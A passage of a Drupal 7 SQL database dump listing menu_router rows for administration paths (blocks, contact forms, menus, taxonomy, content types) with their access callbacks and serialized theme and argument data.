Bartik','t','','','a:0:{}',140,'','',-10,'modules/block/block.admin.inc'),('admin/structure/block/list/seven','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/seven/seven.info\";s:4:\"name\";s:5:\"seven\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:5:\"Seven\";s:11:\"description\";s:65:\"A simple one-column, tableless, fluid width administration theme.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"1\";}s:7:\"regions\";a:8:{s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:13:\"sidebar_first\";s:13:\"First sidebar\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:14:\"regions_hidden\";a:3:{i:0;s:13:\"sidebar_first\";i:1;s:8:\"page_top\";i:2;s:11:\"page_bottom\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/seven/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_display','a:1:{i:0;s:5:\"seven\";}','',31,5,1,'admin/structure/block','admin/structure/block','Seven','t','','','a:0:{}',132,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/seven/add','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:1:{i:0;s:20:\"block_add_block_form\";}','',63,6,1,'admin/structure/block/list/seven','admin/structure/block','Add block','t','','','a:0:{}',388,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/stark','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/stark/stark.info\";s:4:\"name\";s:5:\"stark\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:5:\"Stark\";s:11:\"description\";s:208:\"This theme demonstrates Drupal\'s default HTML markup and CSS styles. To learn how to build your own theme and override Drupal\'s default code, see the Theming Guide.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/stark/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_display','a:1:{i:0;s:5:\"stark\";}','',31,5,1,'admin/structure/block','admin/structure/block','Stark','t','','','a:0:{}',132,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/stark/add','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:1:{i:0;s:20:\"block_add_block_form\";}','',63,6,1,'admin/structure/block/list/stark','admin/structure/block','Add block','t','','','a:0:{}',388,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/manage/%/%','a:2:{i:4;N;i:5;N;}','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:3:{i:0;s:21:\"block_admin_configure\";i:1;i:4;i:2;i:5;}','',60,6,0,'','admin/structure/block/manage/%/%','Configure block','t','','','a:0:{}',6,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/manage/%/%/configure','a:2:{i:4;N;i:5;N;}','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:3:{i:0;s:21:\"block_admin_configure\";i:1;i:4;i:2;i:5;}','',121,7,2,'admin/structure/block/manage/%/%','admin/structure/block/manage/%/%','Configure block','t','','','a:0:{}',140,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/manage/%/%/delete','a:2:{i:4;N;i:5;N;}','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:3:{i:0;s:25:\"block_custom_block_delete\";i:1;i:4;i:2;i:5;}','',121,7,0,'admin/structure/block/manage/%/%','admin/structure/block/manage/%/%','Delete block','t','','','a:0:{}',132,'','',0,'modules/block/block.admin.inc'),('admin/structure/contact','','','user_access','a:1:{i:0;s:24:\"administer contact forms\";}','contact_category_list','a:0:{}','',7,3,0,'','admin/structure/contact','Contact form','t','','','a:0:{}',6,'Create a system contact form and set up categories for the form to use.','',0,'modules/contact/contact.admin.inc'),('admin/structure/contact/add','','','user_access','a:1:{i:0;s:24:\"administer contact forms\";}','drupal_get_form','a:1:{i:0;s:26:\"contact_category_edit_form\";}','',15,4,1,'admin/structure/contact','admin/structure/contact','Add category','t','','','a:0:{}',388,'','',1,'modules/contact/contact.admin.inc'),('admin/structure/contact/delete/%','a:1:{i:4;s:12:\"contact_load\";}','','user_access','a:1:{i:0;s:24:\"administer contact forms\";}','drupal_get_form','a:2:{i:0;s:28:\"contact_category_delete_form\";i:1;i:4;}','',30,5,0,'','admin/structure/contact/delete/%','Delete contact','t','','','a:0:{}',6,'','',0,'modules/contact/contact.admin.inc'),('admin/structure/contact/edit/%','a:1:{i:4;s:12:\"contact_load\";}','','user_access','a:1:{i:0;s:24:\"administer contact forms\";}','drupal_get_form','a:2:{i:0;s:26:\"contact_category_edit_form\";i:1;i:4;}','',30,5,0,'','admin/structure/contact/edit/%','Edit contact category','t','','','a:0:{}',6,'','',0,'modules/contact/contact.admin.inc'),('admin/structure/menu','','','user_access','a:1:{i:0;s:15:\"administer menu\";}','menu_overview_page','a:0:{}','',7,3,0,'','admin/structure/menu','Menus','t','','','a:0:{}',6,'Add new menus to your site, edit existing menus, and rename and reorganize menu links.','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/add','','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:2:{i:0;s:14:\"menu_edit_menu\";i:1;s:3:\"add\";}','',15,4,1,'admin/structure/menu','admin/structure/menu','Add menu','t','','','a:0:{}',388,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/item/%/delete','a:1:{i:4;s:14:\"menu_link_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','menu_item_delete_page','a:1:{i:0;i:4;}','',61,6,0,'','admin/structure/menu/item/%/delete','Delete menu link','t','','','a:0:{}',6,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/item/%/edit','a:1:{i:4;s:14:\"menu_link_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:4:{i:0;s:14:\"menu_edit_item\";i:1;s:4:\"edit\";i:2;i:4;i:3;N;}','',61,6,0,'','admin/structure/menu/item/%/edit','Edit menu link','t','','','a:0:{}',6,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/item/%/reset','a:1:{i:4;s:14:\"menu_link_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:2:{i:0;s:23:\"menu_reset_item_confirm\";i:1;i:4;}','',61,6,0,'','admin/structure/menu/item/%/reset','Reset menu link','t','','','a:0:{}',6,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/list','','','user_access','a:1:{i:0;s:15:\"administer menu\";}','menu_overview_page','a:0:{}','',15,4,1,'admin/structure/menu','admin/structure/menu','List menus','t','','','a:0:{}',140,'','',-10,'modules/menu/menu.admin.inc'),('admin/structure/menu/manage/%','a:1:{i:4;s:9:\"menu_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:2:{i:0;s:18:\"menu_overview_form\";i:1;i:4;}','',30,5,0,'','admin/structure/menu/manage/%','Customize menu','menu_overview_title','a:1:{i:0;i:4;}','','a:0:{}',6,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/manage/%/add','a:1:{i:4;s:9:\"menu_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:4:{i:0;s:14:\"menu_edit_item\";i:1;s:3:\"add\";i:2;N;i:3;i:4;}','',61,6,1,'admin/structure/menu/manage/%','admin/structure/menu/manage/%','Add link','t','','','a:0:{}',388,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/manage/%/delete','a:1:{i:4;s:9:\"menu_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','menu_delete_menu_page','a:1:{i:0;i:4;}','',61,6,0,'','admin/structure/menu/manage/%/delete','Delete menu','t','','','a:0:{}',6,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/manage/%/edit','a:1:{i:4;s:9:\"menu_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:3:{i:0;s:14:\"menu_edit_menu\";i:1;s:4:\"edit\";i:2;i:4;}','',61,6,3,'admin/structure/menu/manage/%','admin/structure/menu/manage/%','Edit menu','t','','','a:0:{}',132,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/manage/%/list','a:1:{i:4;s:9:\"menu_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:2:{i:0;s:18:\"menu_overview_form\";i:1;i:4;}','',61,6,3,'admin/structure/menu/manage/%','admin/structure/menu/manage/%','List links','t','','','a:0:{}',140,'','',-10,'modules/menu/menu.admin.inc'),('admin/structure/menu/parents','','','user_access','a:1:{i:0;s:15:\"administer menu\";}','menu_parent_options_js','a:0:{}','',15,4,0,'','admin/structure/menu/parents','Parent menu items','t','','','a:0:{}',0,'','',0,''),('admin/structure/menu/settings','','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:1:{i:0;s:14:\"menu_configure\";}','',15,4,1,'admin/structure/menu','admin/structure/menu','Settings','t','','','a:0:{}',132,'','',5,'modules/menu/menu.admin.inc'),('admin/structure/taxonomy','','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:1:{i:0;s:30:\"taxonomy_overview_vocabularies\";}','',7,3,0,'','admin/structure/taxonomy','Taxonomy','t','','','a:0:{}',6,'Manage tagging, categorization, and classification of your content.','',0,'modules/taxonomy/taxonomy.admin.inc'),('admin/structure/taxonomy/%','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:23:\"taxonomy_overview_terms\";i:1;i:3;}','',14,4,0,'','admin/structure/taxonomy/%','','entity_label','a:2:{i:0;s:19:\"taxonomy_vocabulary\";i:1;i:3;}','','a:0:{}',6,'','',0,'modules/taxonomy/taxonomy.admin.inc'),('admin/structure/taxonomy/%/add','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:3:{i:0;s:18:\"taxonomy_form_term\";i:1;a:0:{}i:2;i:3;}','',29,5,1,'admin/structure/taxonomy/%','admin/structure/taxonomy/%','Add term','t','','','a:0:{}',388,'','',0,'modules/taxonomy/taxonomy.admin.inc'),('admin/structure/taxonomy/%/display','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:13:\"taxonomy_term\";i:2;i:3;i:3;s:7:\"default\";}','',29,5,1,'admin/structure/taxonomy/%','admin/structure/taxonomy/%','Manage display','t','','','a:0:{}',132,'','',2,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/display/default','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:7:\"default\";i:3;s:11:\"user_access\";i:4;s:19:\"administer taxonomy\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:13:\"taxonomy_term\";i:2;i:3;i:3;s:7:\"default\";}','',59,6,1,'admin/structure/taxonomy/%/display','admin/structure/taxonomy/%','Default','t','','','a:0:{}',140,'','',-10,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/display/full','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:4:\"full\";i:3;s:11:\"user_access\";i:4;s:19:\"administer taxonomy\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:13:\"taxonomy_term\";i:2;i:3;i:3;s:4:\"full\";}','',59,6,1,'admin/structure/taxonomy/%/display','admin/structure/taxonomy/%','Taxonomy term page','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/edit','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:24:\"taxonomy_form_vocabulary\";i:1;i:3;}','',29,5,1,'admin/structure/taxonomy/%','admin/structure/taxonomy/%','Edit','t','','','a:0:{}',132,'','',-10,'modules/taxonomy/taxonomy.admin.inc'),('admin/structure/taxonomy/%/fields','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:3:{i:0;s:28:\"field_ui_field_overview_form\";i:1;s:13:\"taxonomy_term\";i:2;i:3;}','',29,5,1,'admin/structure/taxonomy/%','admin/structure/taxonomy/%','Manage fields','t','','','a:0:{}',132,'','',1,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/fields/%','a:2:{i:3;a:1:{s:37:\"taxonomy_vocabulary_machine_name_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:5;}','',58,6,0,'','admin/structure/taxonomy/%/fields/%','','field_ui_menu_title','a:1:{i:0;i:5;}','','a:0:{}',6,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/fields/%/delete','a:2:{i:3;a:1:{s:37:\"taxonomy_vocabulary_machine_name_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:26:\"field_ui_field_delete_form\";i:1;i:5;}','',117,7,1,'admin/structure/taxonomy/%/fields/%','admin/structure/taxonomy/%/fields/%','Delete','t','','','a:0:{}',132,'','',10,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/fields/%/edit','a:2:{i:3;a:1:{s:37:\"taxonomy_vocabulary_machine_name_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:5;}','',117,7,1,'admin/structure/taxonomy/%/fields/%','admin/structure/taxonomy/%/fields/%','Edit','t','','','a:0:{}',140,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/fields/%/field-settings','a:2:{i:3;a:1:{s:37:\"taxonomy_vocabulary_machine_name_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:28:\"field_ui_field_settings_form\";i:1;i:5;}','',117,7,1,'admin/structure/taxonomy/%/fields/%','admin/structure/taxonomy/%/fields/%','Field settings','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/fields/%/widget-type','a:2:{i:3;a:1:{s:37:\"taxonomy_vocabulary_machine_name_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:25:\"field_ui_widget_type_form\";i:1;i:5;}','',117,7,1,'admin/structure/taxonomy/%/fields/%','admin/structure/taxonomy/%/fields/%','Widget type','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/list','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:23:\"taxonomy_overview_terms\";i:1;i:3;}','',29,5,1,'admin/structure/taxonomy/%','admin/structure/taxonomy/%','List','t','','','a:0:{}',140,'','',-20,'modules/taxonomy/taxonomy.admin.inc'),('admin/structure/taxonomy/add','','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:1:{i:0;s:24:\"taxonomy_form_vocabulary\";}','',15,4,1,'admin/structure/taxonomy','admin/structure/taxonomy','Add vocabulary','t','','','a:0:{}',388,'','',0,'modules/taxonomy/taxonomy.admin.inc'),('admin/structure/taxonomy/list','','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:1:{i:0;s:30:\"taxonomy_overview_vocabularies\";}','',15,4,1,'admin/structure/taxonomy','admin/structure/taxonomy','List','t','','','a:0:{}',140,'','',-10,'modules/taxonomy/taxonomy.admin.inc'),('admin/structure/types','','','user_access','a:1:{i:0;s:24:\"administer content types\";}','node_overview_types','a:0:{}','',7,3,0,'','admin/structure/types','Content types','t','','','a:0:{}',6,'Manage content types, including default status, front page promotion, comment settings, etc.','',0,'modules/node/content_types.inc'),('admin/structure/types/add','','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:1:{i:0;s:14:\"node_type_form\";}','',15,4,1,'admin/structure/types','admin/structure/types','Add content type','t','','','a:0:{}',388,'','',0,'modules/node/content_types.inc'),('admin/structure/types/list','','','user_access','a:1:{i:0;s:24:\"administer content types\";}','node_overview_types','a:0:{}','',15,4,1,'admin/structure/types','admin/structure/types','List','t','','','a:0:{}',140,'','',-10,'modules/node/content_types.inc'),('admin/structure/types/manage/%','a:1:{i:4;s:14:\"node_type_load\";}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:14:\"node_type_form\";i:1;i:4;}','',30,5,0,'','admin/structure/types/manage/%','Edit content type','node_type_page_title','a:1:{i:0;i:4;}','','a:0:{}',6,'','',0,'modules/node/content_types.inc'),('admin/structure/types/manage/%/comment/display','a:1:{i:4;s:22:\"comment_node_type_load\";}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:7:\"comment\";i:2;i:4;i:3;s:7:\"default\";}','',123,7,1,'admin/structure/types/manage/%','admin/structure/types/manage/%','Comment display','t','','','a:0:{}',132,'','',4,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/display/default','a:1:{i:4;s:22:\"comment_node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:7:\"default\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:7:\"comment\";i:2;i:4;i:3;s:7:\"default\";}','',247,8,1,'admin/structure/types/manage/%/comment/display','admin/structure/types/manage/%','Default','t','','','a:0:{}',140,'','',-10,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/display/full','a:1:{i:4;s:22:\"comment_node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:4:\"full\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:7:\"comment\";i:2;i:4;i:3;s:4:\"full\";}','',247,8,1,'admin/structure/types/manage/%/comment/display','admin/structure/types/manage/%','Full comment','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/fields','a:1:{i:4;s:22:\"comment_node_type_load\";}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:3:{i:0;s:28:\"field_ui_field_overview_form\";i:1;s:7:\"comment\";i:2;i:4;}','',123,7,1,'admin/structure/types/manage/%','admin/structure/types/manage/%','Comment fields','t','','','a:0:{}',132,'','',3,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/fields/%','a:2:{i:4;a:1:{s:22:\"comment_node_type_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:7;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:7;}','',246,8,0,'','admin/structure/types/manage/%/comment/fields/%','','field_ui_menu_title','a:1:{i:0;i:7;}','','a:0:{}',6,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/fields/%/delete','a:2:{i:4;a:1:{s:22:\"comment_node_type_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:7;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:26:\"field_ui_field_delete_form\";i:1;i:7;}','',493,9,1,'admin/structure/types/manage/%/comment/fields/%','admin/structure/types/manage/%/comment/fields/%','Delete','t','','','a:0:{}',132,'','',10,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/fields/%/edit','a:2:{i:4;a:1:{s:22:\"comment_node_type_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:7;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:7;}','',493,9,1,'admin/structure/types/manage/%/comment/fields/%','admin/structure/types/manage/%/comment/fields/%','Edit','t','','','a:0:{}',140,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/fields/%/field-settings','a:2:{i:4;a:1:{s:22:\"comment_node_type_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:7;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:28:\"field_ui_field_settings_form\";i:1;i:7;}','',493,9,1,'admin/structure/types/manage/%/comment/fields/%','admin/structure/types/manage/%/comment/fields/%','Field settings','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/fields/%/widget-type','a:2:{i:4;a:1:{s:22:\"comment_node_type_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:7;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:25:\"field_ui_widget_type_form\";i:1;i:7;}','',493,9,1,'admin/structure/types/manage/%/comment/fields/%','admin/structure/types/manage/%/comment/fields/%','Widget type','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/delete','a:1:{i:4;s:14:\"node_type_load\";}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:24:\"node_type_delete_confirm\";i:1;i:4;}','',61,6,0,'','admin/structure/types/manage/%/delete','Delete','t','','','a:0:{}',6,'','',0,'modules/node/content_types.inc'),('admin/structure/types/manage/%/display','a:1:{i:4;s:14:\"node_type_load\";}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"node\";i:2;i:4;i:3;s:7:\"default\";}','',61,6,1,'admin/structure/types/manage/%','admin/structure/types/manage/%','Manage display','t','','','a:0:{}',132,'','',2,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/display/default','a:1:{i:4;s:14:\"node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"node\";i:1;i:4;i:2;s:7:\"default\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content 